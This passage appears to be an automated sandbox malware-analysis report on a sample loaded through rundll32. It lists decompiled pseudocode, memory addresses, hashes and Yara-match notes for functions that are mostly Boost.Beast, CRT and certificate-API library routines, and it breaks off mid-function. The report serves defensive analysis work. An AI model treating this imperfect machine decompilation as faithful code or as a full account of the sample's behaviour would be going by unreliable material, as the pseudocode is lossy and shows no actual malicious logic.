				 *((long long*)(_t93 - 0xc0 + 0xd0)) = __rbx;
				_t71 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x5c)) != 8) goto 0x2059e9f2;
				if ( *((intOrPtr*)(__rcx + 0x70)) == 0) goto 0x2059e9f7;
				 *((long long*)(_t92 - 0x39)) = 0x206278d0;
				 *((long long*)(_t92 - 0x31)) = 0x206278d0;
				 *((long long*)(_t92 - 0x29)) = 0x206278d0;
				 *(_t92 - 0x49) = "invalid request body";
				 *((char*)(_t92 - 0x41)) = 1;
				E00000215215205F7764(__rcx, _t92 - 0x49, _t92 - 0x31, _t90, _t91);
				 *((long long*)(_t92 - 0x39)) = 0x20627910;
				 *((long long*)(_t92 - 0x39)) = 0x20627928;
				 *((long long*)(_t92 - 0x19)) = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/message.hpp";
				_t67 = "void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_constant<bool,1>)";
				 *((long long*)(_t92 - 0x11)) = _t67;
				 *((long long*)(_t92 - 9)) = 0x169;
				_t96 = _t92 - 0x19;
				E000002152152059FB40(__rcx, _t92 + 0xf, _t92 - 0x39, _t91, _t92 - 0x19);
				_t36 = E00000215215205F9940(__rcx, _t92 + 0xf, 0x2066bac8, _t91);
				if (0x2066bac8 != 0) goto 0x2059ea1f;
				if (_t36 == 7) goto 0x2059ea1f;
				if (_t36 == 5) goto 0x2059ea1f;
				if (_t36 == 4) goto 0x2059ea1f;
				E00000215215205A1B40(0, _t52, _t67, _t71, _t92 + 0xf, _t90, _t91, _t92 - 0x19, _t98, _t100, _t101);
				_t38 = E00000215215205A2920(0x46, _t71, 0x2066bac8, _t92 - 0x19, _t98);
				goto 0x2059eabc;
				E00000215215205A2BF0(_t38, _t71, _t92 - 0x19, 0x2066bac8, _t90, _t91, _t92);
				_t23 = _t67 + 8; // 0x8
				_t79 = _t23;
				_t88 =  *_t67;
				 *(_t92 - 0x49) = _t79;
				 *((long long*)(_t92 - 0x41)) = _t88;
				asm("movaps xmm0, [ebp-0x49]");
				asm("movdqa [ebp-0x49], xmm0");
				_t69 =  *((intOrPtr*)( *[gs:0x58] + _t79 * 8));
				_t59 =  *0x20683590 -  *((intOrPtr*)(_t88 +  *((intOrPtr*)( *[gs:0x58] + _t79 * 8)))); // 0x0
				if (_t59 <= 0) goto 0x2059ea8a;
				E00000215215205F53CC();
				if ( *0x20683590 != 0xffffffff) goto 0x2059ea8a;
				E0000021521520595A20( *((intOrPtr*)(_t88 +  *((intOrPtr*)( *[gs:0x58] + _t79 * 8)))),  *0x20683590 - 0xffffffff,  *((intOrPtr*)( *[gs:0x58] + _t79 * 8)), _t71, _t88, _t90, _t91, _t96, _t98, _t101);
				E00000215215205F536C();
				asm("movaps xmm0, [0xe4f9f]");
				asm("movaps [ebp-0x39], xmm0");
				E00000215215205A05E0(0x46, _t52, _t71, 0x20683590, _t92 - 0x39, _t92 - 0x49);
				E00000215215205A08F0(_t44, _t71, _t71, _t69, _t90, _t91, _t100);
				return E00000215215205A1B40(0, _t52, _t69, _t71, _t71, _t90, _t91, _t92 - 0x39, _t92 - 0x49, _t100, _t101);
			}




















                0x2152059e930
                0x2152059e932
                0x2152059e93e
                0x2152059e946
                0x2152059e94e
                0x2152059e95b
                0x2152059e964
                0x2152059e971
                0x2152059e977
                0x2152059e97b
                0x2152059e986
                0x2152059e98a
                0x2152059e996
                0x2152059e9a3
                0x2152059e9ae
                0x2152059e9b9
                0x2152059e9bd
                0x2152059e9c4
                0x2152059e9c8
                0x2152059e9d0
                0x2152059e9dc
                0x2152059e9ec
                0x2152059e9f5
                0x2152059e9fa
                0x2152059e9ff
                0x2152059ea04
                0x2152059ea08
                0x2152059ea15
                0x2152059ea1a
                0x2152059ea23
                0x2152059ea28
                0x2152059ea28
                0x2152059ea2c
                0x2152059ea2f
                0x2152059ea33
                0x2152059ea37
                0x2152059ea3b
                0x2152059ea54
                0x2152059ea5b
                0x2152059ea61
                0x2152059ea6a
                0x2152059ea76
                0x2152059ea78
                0x2152059ea85
                0x2152059ea8a
                0x2152059ea91
                0x2152059eaa2
                0x2152059eaad
                0x2152059eacc

                APIs
                Strings
                • D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp, xrefs: 000002152059E9B2
                • invalid request body, xrefs: 000002152059E97F
                • void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_, xrefs: 000002152059E9BD
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp$invalid request body$void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_
                • API String ID: 3608347590-3682780498
                • Opcode ID: ef42b276195ea1f7d67a054b94232194323117159da1f3a4f595506e7e5ee1e7
                • Instruction ID: 23f0c1dad963a9be23953da789a45d3d3ae324f74084bc968ce0a9ad5a92c430
                • Opcode Fuzzy Hash: ef42b276195ea1f7d67a054b94232194323117159da1f3a4f595506e7e5ee1e7
                • Instruction Fuzzy Hash: C9417B32702F64C9FB20DBA4E8883DC33B1BFA8748F544565DE4952AADEB38C555C780
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EC0AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 45%
                			E00007FFA7FFA535EC0AC(void* __ecx, void* __edx, void* _a24, long long _a28, long long _a32, long long _a36, long long _a40, long long _a44, intOrPtr _a48) {
				long long _v20;
				long long _v24;
				long long _v28;
				long long _v32;
				long long _v36;
				long long _v40;
				void* _v48;
				signed long long _v56;
				void* __rbx;
				void* _t32;
				void* _t33;
				void* _t36;
				long long _t45;
				long long _t50;
				signed long long _t52;
				signed long long _t54;
				void* _t60;
				void* _t62;
				void* _t63;

				_t34 = __ecx;
				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_t52 = _t54;
				r8d = 0;
				if ( *0x53671ce0 == _t60) goto 0x535ec0e7;
				r8d = r8d + 1;
				if (0x7ffa53671cf0 - 0x53671eb0 < 0) goto 0x535ec0cc;
				goto 0x535ec0f2;
				_t45 =  *((intOrPtr*)(0x53671ce0 + 8 + (r8d + r8d) * 8));
				 *((intOrPtr*)(_t45 - 0x7b)) =  *((intOrPtr*)(_t45 - 0x7b)) - __ecx;
				 *(_t63 - 0x50 + _t52 * 2 - 0x75) =  *(_t63 - 0x50 + _t52 * 2 - 0x75) << 0x44;
				_v40 = _t45;
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_t50 = _a44;
				_v20 = _t50;
				_v56 = _t52;
				E00007FFA7FFA535EC1A0(_t33, _t36, _t52, _a48, 0xffc0, _t62);
				E00007FFA7FFA535EF8B8(_t33, _t52,  &_v56);
				if (_t50 != 0) goto 0x535ec15d;
				E00007FFA7FFA535EC07C(_t34, _t50, _t52);
				asm("movsd xmm0, [esp+0x40]");
				goto 0x535ec17a;
				E00007FFA7FFA535EC1A0(_t33, _t36, _t52, _t52, 0xffc0, _t62);
				_t32 = E00007FFA7FFA535EC07C(_t34, _t50, _t52);
				asm("movsd xmm0, [esp+0x80]");
				return _t32;
			}






















                0x7ffa535ec0ac
                0x7ffa535ec0ac
                0x7ffa535ec0b2
                0x7ffa535ec0c4
                0x7ffa535ec0c9
                0x7ffa535ec0ce
                0x7ffa535ec0d0
                0x7ffa535ec0e1
                0x7ffa535ec0e5
                0x7ffa535ec0ed
                0x7ffa535ec103
                0x7ffa535ec106
                0x7ffa535ec10d
                0x7ffa535ec115
                0x7ffa535ec11d
                0x7ffa535ec125
                0x7ffa535ec130
                0x7ffa535ec134
                0x7ffa535ec13b
                0x7ffa535ec13f
                0x7ffa535ec143
                0x7ffa535ec14d
                0x7ffa535ec154
                0x7ffa535ec158
                0x7ffa535ec15d
                0x7ffa535ec163
                0x7ffa535ec165
                0x7ffa535ec16c
                0x7ffa535ec171
                0x7ffa535ec17f

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_set_errno_from_matherr
                • String ID: exp
                • API String ID: 4230380726-113136155
                • Opcode ID: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction ID: 7f92bde535e805f478016e6247d36e16d9f3180c8d1306ddfc0597af4ff2a88e
                • Opcode Fuzzy Hash: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction Fuzzy Hash: DC21FC36A28B85CBE764DF28E44066A73A5FFCA740F54A135F68E92B55DE3CD4409F00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520612EA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 40%
                			E0000021521520612EA4(char __ecx, void* __edx, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long long _v48;
				char _v56;
				void* __rbx;
				void* _t31;
				char _t32;
				void* _t38;
				long long _t47;
				void* _t48;
				void* _t53;
				void* _t54;

				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_push(_t48);
				_t32 = __ecx;
				r8d = 0;
				if ( *0x20635b60 == __edx) goto 0x20612edf;
				r8d = r8d + 1;
				if (0x21520635b70 - 0x20635d30 < 0) goto 0x20612ec4;
				goto 0x20612eea;
				_t47 =  *((intOrPtr*)(0x20635b60 + 8 + (r8d + r8d) * 8));
				_v48 = _t47;
				if (_t47 == 0) goto 0x20612f5d;
				_v40 = _a24;
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_v20 = _a44;
				_v56 = __ecx;
				E0000021521520613178(__ecx, _t38, _t48, _a48, _t53, _t54);
				_t52 =  &_v56;
				if (E0000021521520614FB8(_t32, _t48,  &_v56) != 0) goto 0x20612f55;
				E0000021521520612E74(_t32, _t47,  &_v56);
				asm("movsd xmm0, [esp+0x40]");
				goto 0x20612f72;
				E0000021521520613178(_t32, _t38, _t48,  &_v56, _t53, _t54);
				_t31 = E0000021521520612E74(_t32, _t47, _t52);
				asm("movsd xmm0, [esp+0x80]");
				return _t31;
			}



















                0x21520612ea4
                0x21520612eaa
                0x21520612eb0
                0x21520612ebc
                0x21520612ec1
                0x21520612ec6
                0x21520612ec8
                0x21520612ed9
                0x21520612edd
                0x21520612ee5
                0x21520612ef7
                0x21520612eff
                0x21520612f05
                0x21520612f0d
                0x21520612f15
                0x21520612f1d
                0x21520612f28
                0x21520612f33
                0x21520612f37
                0x21520612f3b
                0x21520612f40
                0x21520612f4c
                0x21520612f50
                0x21520612f55
                0x21520612f5b
                0x21520612f5d
                0x21520612f64
                0x21520612f69
                0x21520612f77

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _ctrlfp_set_errno_from_matherr
                • String ID: exp
                • API String ID: 4230380726-113136155
                • Opcode ID: 1cc3016368783f852a81b867ecb1768de0bc5fcd9cde4a88de83dafe706250b5
                • Instruction ID: 790644a159b3ce59a537add811eef055e66643799c95bbdaa01848216dc55621
                • Opcode Fuzzy Hash: 1cc3016368783f852a81b867ecb1768de0bc5fcd9cde4a88de83dafe706250b5
                • Instruction Fuzzy Hash: 31213D37616A55CBDB70CF28E44529AB6B0FBE9740F604225FA8D82B5ADB38D8118F00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205A4240 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00000215215205A4240(long long __rbx, long long* __rcx, long long __rdx, void* _a8) {
				char _v80;
				char _v96;
				long long _v112;
				long long _v120;
				char _v128;
				long long _v136;
				char _v144;
				char _v152;
				void* __rdi;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				intOrPtr* _t47;
				long long* _t54;
				void* _t55;
				void* _t56;
				void* _t62;

				_t62 = _t56;
				 *((long long*)(_t62 - 0x58)) = 0xfffffffe;
				 *((long long*)(_t62 + 8)) = __rbx;
				_t54 = __rcx;
				if (__rdx - 0x15 <= 0) goto 0x205a42fd;
				_v152 = 0x206278d0;
				_v144 = 0x206278d0;
				_v136 = 0x206278d0;
				 *((long long*)(_t62 - 0x68)) = "n > max_size()";
				_v96 = 1;
				E00000215215205F7764(__rdx, _t62 - 0x68,  &_v144, __rcx, _t55);
				_v152 = 0x20627910;
				_v152 = 0x20627940;
				_v128 = "D:\\Sources\\boost_1_78_0\\boost/beast/core/impl/static_string.hpp";
				_v120 = "void __cdecl boost::beast::static_string<21,char,struct std::char_traits<char> >::resize(unsigned __int64)";
				_v112 = 0x1e6;
				E000002152152059FCD0(__rdx,  &_v80,  &_v152, _t55,  &_v128);
				_t47 =  &_v80;
				E00000215215205F9940(__rdx, _t47, 0x2066b800, _t55);
				_t40 =  *_t47;
				if (__rdx -  *_t47 <= 0) goto 0x205a4319;
				_t26 = E00000215215205F8EF0(_t27, 0, _t29, _t30, _t47 + 8 + _t40, 0x2066b800, _t54, __rdx - _t40);
				 *_t54 = __rdx;
				 *((char*)(__rdx + _t54 + 8)) = 0;
				return _t26;
			}





















                0x215205a4240
                0x215205a424b
                0x215205a4253
                0x215205a425a
                0x215205a4261
                0x215205a426e
                0x215205a4275
                0x215205a427a
                0x215205a4286
                0x215205a428a
                0x215205a4298
                0x215205a42a5
                0x215205a42b1
                0x215205a42bd
                0x215205a42c9
                0x215205a42ce
                0x215205a42e6
                0x215205a42f2
                0x215205a42f7
                0x215205a42fd
                0x215205a4303
                0x215205a4314
                0x215205a4319
                0x215205a431c
                0x215205a4331

                APIs
                Strings
                • n > max_size(), xrefs: 00000215205A427F
                • void __cdecl boost::beast::static_string<21,char,struct std::char_traits<char> >::resize(unsigned __int64), xrefs: 00000215205A42C2
                • D:\Sources\boost_1_78_0\boost/beast/core/impl/static_string.hpp, xrefs: 00000215205A42B6
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                • String ID: D:\Sources\boost_1_78_0\boost/beast/core/impl/static_string.hpp$n > max_size()$void __cdecl boost::beast::static_string<21,char,struct std::char_traits<char> >::resize(unsigned __int64)
                • API String ID: 3608347590-1223756683
                • Opcode ID: 9955e44f8ce3896daec48110e685f0215b9124366ab22535fd92924e8c1757bd
                • Instruction ID: f3fe4e230c6f2e0ba569388f794fae4d12d9ca990f6f397695354161349db4c0
                • Opcode Fuzzy Hash: 9955e44f8ce3896daec48110e685f0215b9124366ab22535fd92924e8c1757bd
                • Instruction Fuzzy Hash: ED212A73206F90D5EB209B14F8883CA77A4FB94394F904266EA9D437A9EB3CC655C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205B72D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 55%
                			E00000215215205B72D0(long long __rax, long long __rbx, long long __rcx, void* __rdx, long long _a8, long long _a16) {
				long long _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				long long _v56;
				void* __rdi;
				long long _t35;
				long long _t41;
				void* _t52;

				_t35 = __rax;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_a16 = __rbx;
				_t41 = __rcx;
				E00000215215205D19DC(0, __rcx);
				 *((long long*)(_t41 + 8)) = _t35;
				 *((char*)(_t41 + 0x10)) = 0;
				 *((long long*)(_t41 + 0x18)) = _t35;
				 *((char*)(_t41 + 0x20)) = 0;
				 *((long long*)(_t41 + 0x28)) = _t35;
				 *((short*)(_t41 + 0x30)) = 0;
				 *((long long*)(_t41 + 0x38)) = _t35;
				 *((short*)(_t41 + 0x40)) = 0;
				 *((long long*)(_t41 + 0x48)) = _t35;
				 *((char*)(_t41 + 0x50)) = 0;
				 *((long long*)(_t41 + 0x58)) = _t35;
				 *((char*)(_t41 + 0x60)) = 0;
				if (__rdx != 0) goto 0x205b7380;
				_v32 = 0x206278d0;
				_v24 = 0x206278d0;
				_v16 = 0x206278d0;
				_v48 = "bad locale name";
				_v40 = 1;
				E00000215215205F7764(_t41,  &_v48,  &_v24, __rdx, _t52);
				_v32 = 0x20627970;
				E00000215215205F9940(_t41,  &_v32, 0x2066bb38, _t52);
				asm("int3");
				return E00000215215205D6E2C(0x20627970, _t41, _t41, __rdx);
			}













                0x215205b72d0
                0x215205b72d0
                0x215205b72da
                0x215205b72e3
                0x215205b72eb
                0x215205b72f0
                0x215205b72f8
                0x215205b72fc
                0x215205b72ff
                0x215205b7303
                0x215205b7306
                0x215205b730a
                0x215205b730e
                0x215205b7312
                0x215205b7316
                0x215205b731a
                0x215205b731d
                0x215205b7321
                0x215205b7327
                0x215205b7330
                0x215205b7337
                0x215205b733c
                0x215205b7348
                0x215205b734d
                0x215205b735c
                0x215205b7369
                0x215205b737a
                0x215205b737f
                0x215205b7399

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exceptionstd::_$FileHeaderLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__std_exception_copy
                • String ID: bad locale name
                • API String ID: 1909641974-1405518554
                • Opcode ID: cd7e34b31d0c2e87ad5880a43c03d9ed14a9b9dfccdb81bf2bb5eda750aecf7e
                • Instruction ID: 0ee75a2e21b25fd9c1451d705c0dcce08968486148ea34bb281cc42057d21f7a
                • Opcode Fuzzy Hash: cd7e34b31d0c2e87ad5880a43c03d9ed14a9b9dfccdb81bf2bb5eda750aecf7e
                • Instruction Fuzzy Hash: 1F216F33206F80C9C750DF24F88428977B5FBA9BA4F245265EA9C8376DEB38C594C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205996A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52encryptionCOMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E00000215215205996A0(long long __rbx, char* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8) {
				void* _v8;
				long long _v24;
				intOrPtr _v88;
				void* __rdi;
				void* _t20;
				long _t21;
				void* _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t38;
				char* _t50;
				void* _t52;
				long long _t55;
				void* _t57;
				void* _t60;

				_t46 = __rdx;
				_t39 = __rbx;
				_t38 = _t57;
				 *((long long*)(_t38 - 0x68)) = 0xfffffffe;
				 *((long long*)(_t38 + 0x10)) = __rbx;
				 *((long long*)(_t38 + 0x18)) = __rbp;
				 *((long long*)(_t38 + 0x20)) = __rsi;
				_t52 = __rdx;
				_t50 = __rcx;
				_t55 =  *((intOrPtr*)(__rcx + 0x58));
				if (_t55 == 0) goto 0x2059974e;
				_t6 = _t46 + 0x50; // 0x50
				r8d = _t6;
				_t20 = E00000215215205F8EF0(_t29, 0, _t31, _t32, _t38 - 0x58, __rdx, __rcx, _t60);
				_v88 = 0x50;
				_v24 = _t55;
				_a8 = 0;
				__imp__CertCreateCertificateChainEngine();
				if (_t20 != 0) goto 0x2059972a;
				_t21 = GetLastError();
				__imp__CertFreeCertificateChainEngine();
				goto 0x20599760;
				_t22 = E00000215215205997A0(_t21, __rbx, _a8, __rdx, _t50, _a8);
				__imp__CertFreeCertificateChainEngine();
				if (_t22 == 0) goto 0x20599760;
				if ( *_t50 == 0) goto 0x20599760;
				r8d = 0;
				return E00000215215205997A0(_t22, _t39, _a8, _t52, _t50, _a8);
			}



















                0x215205996a0
                0x215205996a0
                0x215205996a0
                0x215205996ab
                0x215205996b3
                0x215205996b7
                0x215205996bb
                0x215205996bf
                0x215205996c2
                0x215205996ca
                0x215205996d1
                0x215205996d5
                0x215205996d5
                0x215205996dd
                0x215205996e2
                0x215205996ea
                0x215205996ef
                0x21520599708
                0x21520599710
                0x21520599712
                0x21520599722
                0x21520599728
                0x21520599735
                0x21520599744
                0x2152059974c
                0x21520599751
                0x21520599753
                0x2152059977a

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CertCertificateChainEngine$Free$CreateErrorLast
                • String ID: P
                • API String ID: 2119563119-3110715001
                • Opcode ID: f79cfe4300ef73199386e7bb36637cad025c75a79c11fe12d50f381a4ed2e88c
                • Instruction ID: aedbd947e8aab84f15a88f3cc7368ae23f1558fcb278909f7daa06b540db944f
                • Opcode Fuzzy Hash: f79cfe4300ef73199386e7bb36637cad025c75a79c11fe12d50f381a4ed2e88c
                • Instruction Fuzzy Hash: 16215E73325E94CAEB608F69E48878E23A5FBD5F90F144261DE5843799DF38C805CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152059EB90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36COMMON
                Download Yara Rule
                C-Code - Quality: 47%
                			E000002152152059EB90(intOrPtr __edx) {
				char _v80;
				long long _v88;
				char _v96;
				char _v104;
				long long _v112;
				long long _v120;
				char _v128;
				long long _v136;
				char _v144;
				char _v152;
				void* _t22;
				intOrPtr _t23;
				void* _t32;
				char* _t35;
				void* _t39;
				void* _t40;

				_t23 = __edx;
				_v88 = 0xfffffffe;
				if (__edx - 0x3e7 <= 0) goto 0x2059ec44;
				_v152 = 0x206278d0;
				_v144 = 0x206278d0;
				_v136 = 0x206278d0;
				_v104 = "invalid status-code";
				_v96 = 1;
				E00000215215205F7764(_t32,  &_v104,  &_v144, _t39, _t40);
				_v152 = 0x20627910;
				_v152 = 0x20627928;
				_v128 = "D:\\Sources\\boost_1_78_0\\boost/beast/http/impl/message.hpp";
				_v120 = "void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)";
				_v112 = 0x8b;
				E000002152152059FB40(_t32,  &_v80,  &_v152, _t40,  &_v128);
				_t35 =  &_v80;
				_t22 = E00000215215205F9940(_t32, _t35, 0x2066bac8, _t40);
				 *((intOrPtr*)(_t35 + 0x5c)) = _t23;
				return _t22;
			}



















                0x2152059eb90
                0x2152059eb97
                0x2152059eba6
                0x2152059ebb3
                0x2152059ebba
                0x2152059ebbf
                0x2152059ebcb
                0x2152059ebd0
                0x2152059ebdf
                0x2152059ebec
                0x2152059ebf8
                0x2152059ec04
                0x2152059ec10
                0x2152059ec15
                0x2152059ec2d
                0x2152059ec39
                0x2152059ec3e
                0x2152059ec44
                0x2152059ec4e

                APIs
                Strings
                • D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp, xrefs: 000002152059EBFD
                • invalid status-code, xrefs: 000002152059EBC4
                • void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int), xrefs: 000002152059EC09
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/message.hpp$invalid status-code$void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)
                • API String ID: 3608347590-1062302746
                • Opcode ID: 044baebbdb73662a108632ded4ef622990c8f6eb39cf9fb03145086468f8e6ab
                • Instruction ID: 21dfbe7e2b1d5f19e0e10009caa82fe560660af4798e229e1933e157f357f360
                • Opcode Fuzzy Hash: 044baebbdb73662a108632ded4ef622990c8f6eb39cf9fb03145086468f8e6ab
                • Instruction Fuzzy Hash: 0E11E932206F91D5DB60DB44F4843CAB7A4FBD4364F905266E6DC42BA8EB7CC259CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7098 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction ID: 4179510b56d69c6193ada976ec2268c1f94c609e12c43dd7f7d25d74ae170532
                • Opcode Fuzzy Hash: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction Fuzzy Hash: 6DF04F61A39F4285EF449B61F4842792366EFCA790F4CA43AD94F96664DE3CD488C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060AF58 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: e9e8d7fb16d73e31bfa742ca577ae93c05d2f0ff201ae8e943ab334c9cf564bb
                • Instruction ID: 992e5ecc9129905d11aa2d3ce8dc5879b631493bba1ee2bc75af0bfe473280bb
                • Opcode Fuzzy Hash: e9e8d7fb16d73e31bfa742ca577ae93c05d2f0ff201ae8e943ab334c9cf564bb
                • Instruction Fuzzy Hash: 32F062B3222E51C1EF649B51F4987E963A1FFE8B90F685065AD0B46668DF3CD488C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F37AC Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E00007FFA7FFA535F37AC(signed long long __ebx, signed long long __esi, intOrPtr* __rcx, long long __rdx, intOrPtr* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t65;
				int _t67;
				void* _t69;
				void* _t74;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				signed long long _t133;
				signed long long _t134;
				intOrPtr* _t140;
				intOrPtr* _t142;
				signed long long _t143;
				signed long long _t156;
